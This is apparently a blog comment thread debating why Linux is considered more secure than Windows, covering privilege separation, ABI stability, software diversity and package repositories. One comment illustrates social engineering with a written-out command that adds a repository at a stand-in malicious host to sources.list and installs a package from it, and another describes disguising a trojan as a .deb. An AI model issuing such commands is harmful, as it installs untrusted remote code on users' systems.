One question for Linux gurus: Why is it that Linux/Ubuntu is said to be so secure? (to the point that you almost don't need AV)
Is it simply because no viruses are written for Linux (as with Macs), or is there something special about the Linux architecture/core that makes it less vulnerable to attacks?
I'm not a guru, though with twelve years' experience, I feel I am qualified to answer.
The most important part involves the history of Unix (Linux is a Unix-alike), which is forty years old. Unix has had privilege separation and emphasized multi-user environments for over thirty years. While the system for privilege separation is rather simple by today's standards, every program on any modern Unix (or Linux) grew out of the Unix multi-user culture. Programs respect it. They don't require root (admin) privileges to run. They don't expect a single-user environment.
Like I said, this user/group/all privilege system is too simple to be comprehensively secure with all the sophisticated attack methods people use these days. SELinux and AppArmor are additional systems which sit on top of the old u-g-a system and which sandbox processes. Ubuntu uses AppArmor for a lot of applications.
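To make the u-g-a model concrete, here is a minimal sketch (assuming a standard GNU coreutils environment; the file name is made up):

```shell
# Classic user/group/all (u-g-a) permissions: every file carries three
# sets of read/write/execute bits. Restrict a file to its owner and
# inspect the result.
touch /tmp/notes.txt
chmod 600 /tmp/notes.txt            # rw for the owner, nothing for group/others
stat -c '%a' /tmp/notes.txt         # prints the octal mode: 600
ls -l /tmp/notes.txt                # shows -rw------- plus owner and group
rm /tmp/notes.txt
```

Simple as it is, this is the baseline every Unix program is written against; SELinux and AppArmor then add finer-grained confinement on top.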
On the other hand, desktop systems like Windows and Mac come from a single-user culture. Sure, the NT kernel and the XNU kernel (part of Darwin) used by modern versions of Windows and Mac both have privilege separation (and in fact, Mac is a certified Unix, unlike Linux), but the cultures have long been single-user, and the applications written on top of the kernels express that. It's difficult to secure a system when the applications are fighting you. In fact, Windows' security model is probably more advanced than Ubuntu's now, but some poor programming practices and the single-user culture shoot Windows' security in the foot. Mac, too, makes extreme compromises in the name of user-friendliness and sets itself up to be the first to go down in all the Pwn2Own competitions.
Secondly, we have diversity and heterogeneity. Microsoft makes great effort to retain backward compatibility between releases. In other words, the ABI is stable. Binary programs which worked in version N-1 are expected to work in version N. The Linux kernel promises nothing of the sort, and indeed, seems to take great pride in changing the ABI as often as possible. Binary applications break randomly and no one makes an effort to stop that. Imagine being a Trojan or virus trying to keep up with the latest version. At any one time, there are tens of kernel versions in the wild, and in truth, each distribution generally has a slightly customized version.
Why doesn't that lack of ABI stability destroy the Linux ecosystem? Well, because few programs are distributed as binaries. Linux has a relatively stable API, so applications can easily be re-compiled (by Debian and Ubuntu, in this case) to use the new kernel headers.
When you look on top of the kernel layer, you see even more heterogeneity. Not only do you have desktop environments like GNOME and KDE, but also XFCE, ROX, and LXDE. You have window managers like OpenBox, FluxBox, and RatPoison. You have two different print systems. You have three major word processors. I don't even want to count the number of browsers, file managers, and text editors. In a diverse system like this, what attack can be automated? Non-automated attacks are costly. Heck, you can even run Debian on the FreeBSD kernel if you want to.
Compare Linux's situation with Windows':
- ABI stability
- IE used in at least 60% of cases
- MS Office installed on most systems
Finally, you have the market share factor. It's real. Windows is a large target with that homogeneity that Linux lacks. Not only does Linux have 1-2% of the installed base, that 1-2% is misleading ... because each distro is in actuality a different OS which likely needs different automated scans to penetrate. Is all that work worth the effort?
Is Linux impenetrable? No, of course not. Red Hat 5 and 6 were especially vulnerable to some automated attacks, and one of my boxes even got owned back in 2000 or so. These days, there's not so much to worry about, but you are unlikely to stop a dedicated and talented individual from breaking in unless you know a good deal about system hardening. Then there's the user issue. Create a nice trojan. Package it as a .deb. Advertise it as a great new screensaver. Get users to install the .deb. Bang! The users are owned.
The weakest link is always the user. Once Linux gets an install base outside of techies, I expect we'll see some trojans.
One critical point is missing: open source does not guarantee that there will be no security flaws, but it does keep anyone from hiding back doors in their programs. Even if you don't read the source, someone else will.
I agree with you, but with people installing Skype, Windows programs through Wine, and other closed-source apps, you lose that benefit.
You say that there's no guarantee of ABI stability in Linux. That is wrong. The ELF format doesn't change, and the way to make syscalls doesn't change. That is, as far as userspace processes (applications included) are concerned, the ABI does not change. The Linux kernel does not break old applications; you can still run old closed-source ports of games, such as UT99 -- that is, the ABI did not change with regard to the kernel.
What does change is the internal kernel API and ABI. A driver does not see a stable API and ABI; an application does (with regard to the kernel). Grab old libraries and old software runs; grab old drivers for 2.2 and compiling them against today's 2.6.31 will fail miserably (not to mention an attempt to just insmod an old .ko).
So why is it that you probably can't run old apps on today's machines without recompiling? Because GNU/Linux culture says "Use shared objects!" (the equivalent of .dlls). But as long as you statically link your libraries, you're good to go. Since UT99 was statically linked with SDL and friends, it won't fail to find .so files -- since it does not use them.
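The static-versus-dynamic distinction can be checked directly with `file` and `ldd` (a sketch; `hello.c` here is a hypothetical source file, and the exact output wording varies by system):

```shell
# A dynamically linked binary records its .so dependencies, which ldd
# will list; a statically linked one (like the old UT99 port) carries
# everything inside itself and needs no .so files at runtime.
file /bin/ls                        # on a typical system: "...dynamically linked..."
ldd /bin/ls                         # lists libc.so and other shared objects
# Building a static binary instead (hello.c is a placeholder):
#   gcc -static hello.c -o hello
#   file hello                      # "...statically linked..."
#   ldd hello                       # "not a dynamic executable"
```

This is why a statically linked program can survive library upgrades that break its dynamically linked neighbors.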
If a good hole is found, a statically linked virus or one attacking specifically Debian Lenny or Ubuntu 9.04 or similar would today probably penetrate a significant portion of machines.
What would stop it is quick patching of the hole and auto-updating via apt-get. And this is another thing that is dangerous among FLOSS users: trusting our repositories blindly and nearly absolutely, while it would be simple to slip a piece of malicious software through an update to a package. The repercussions would be severe for whoever performed such an attack, but it is not impossible, and I wonder why it hasn't happened yet.
Otherwise your commentary is mostly something I can agree with and back.
Oh and:
"Linux has a relatively stable API, so applications can be easily re-compiled (by Debian and Ubuntu, in this case) to use the new kernel headers."
Most apps don't touch the kernel headers :-)
Ivan,
Thanks for the clarification of my point. If the program is written to POSIX or is a graphical app relying on mid-level libraries, then, yeah, but I was largely considering rootkits and the like (the classic Unix malware), which are generally inserted into a running kernel.
I definitely should have taken more time reading my post after it was written.
There is only one reason why Linux is more secure than Windows: how it handles executable files. In Linux you cannot simply double-click an exe file and run it. Even if you obtained some malicious file, you would have to make it executable first and then launch it with root privileges. The average user cannot do all that. But what he can do in Windows is click on a malicious file, click through (or skip) UAC, and you're done and enjoying the infection. Not to mention the fact that you're still an administrator after a default Vista/7 installation...
ReplyDeleteAnonymous:
1. "wine blah.exe", performed automatically for exe files on, as you call it, "double-click".
2. "Dear Ubuntu user,
to run our SpecialSoftware2K, perform these steps. a) Right click on file (image 1). b) Go to permissions tab (image 2). c) Check the Executable checkbox (image 3). d) Doubleclick on the file (image 4)." Social engineering.
3. "To install, run: echo "deb http://malicious.software.inc/debian lenny main" >> /etc/apt/sources.list ; apt-get update ; apt-get install specialsoftware2k" - and a similar but GUI-fied process will become the standard for installing crapware once a GNU/Linux distribution becomes popular among "commonfolk".
So while the matter your argument covers certainly helps improve security, it's hardly the one-and-only reason, as you call it -- in fact, not even a highly important one.
Why isn't Mac so virus-ridden when you also don't have to manually mark a file as executable?
Linux is largely secure due to a couple of reasons:
First is the proper administrator/user account system. A user only has certain privileges, so a virus could only do limited damage if you even got one.
Second, being open source helps the developer community issue patches quickly. If a hole or exploit is found, the fix comes right on the heels of it. Compare that to the IE spoofing bug that didn't get fixed for something like seven years, and still isn't foolproof.
Third, the repository system keeps packages in check. This only works if you install only from repositories, and only from trusted ones. If you compile from source, or use unknown third-party repositories, you can create a security risk. However, if you only use repository-built apps, the apps have been built by expert packagers who have tested the package and can assure you it's free of nasties.
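The trust the repository system provides boils down to checksums published in a cryptographically signed index, which apt verifies before installing anything. A toy sketch of the verification idea (file names are made up; real apt does this against the signed Release/Packages files):

```shell
# apt compares each downloaded .deb against checksums carried in the
# archive's signed index. The same idea, done by hand:
echo "pretend package contents" > /tmp/pkg.deb   # stand-in for a downloaded .deb
sha256sum /tmp/pkg.deb > /tmp/index.sha256       # what the signed index would carry
sha256sum -c /tmp/index.sha256                   # verification: prints "/tmp/pkg.deb: OK"
rm /tmp/pkg.deb /tmp/index.sha256
```

A tampered package would fail this check, which is why the weak point is not the download but the decision to trust a repository's key in the first place.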
Last, Windows allows applications that should run in user space to run in administrator space, causing insecurity. To make matters worse, it uses technologies like ActiveX, which run in your browser and are riddled with security holes. Linux is much better about this: apps run in their proper user space, and distros are now introducing sandboxing to make it even more secure.
Linux isn't foolproof. There have been servers that have suffered attacks, and there are rootkits. However, Linux, by way of its Unix background and the fact that it runs on so many servers and powers the majority of the internet itself, is built to be secure from scratch. Windows was built from single-user DOS origins that were never intended for servers or anything else that might pose a security problem. Security was an afterthought with Windows.
NO, Linux certainly isn't foolproof. It's a nice thought but not realistic. Anything run by anyone (except possibly a bare base install of OpenBSD) has the ability to be attacked. And that's not the worst of it, since the Linux kernel is bloated now. Oo